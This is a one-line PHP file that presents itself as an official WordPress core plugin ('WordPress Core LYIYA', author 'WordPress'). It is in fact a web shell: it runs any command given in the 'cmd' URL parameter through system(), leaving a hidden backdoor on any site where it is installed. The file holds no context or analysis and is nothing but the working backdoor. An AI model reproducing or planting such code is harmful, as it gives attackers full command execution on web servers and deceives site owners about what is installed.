<?php /* Plugin Name: WordPress Core LYIYA Version: 1.0 Author: WordPress */ if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>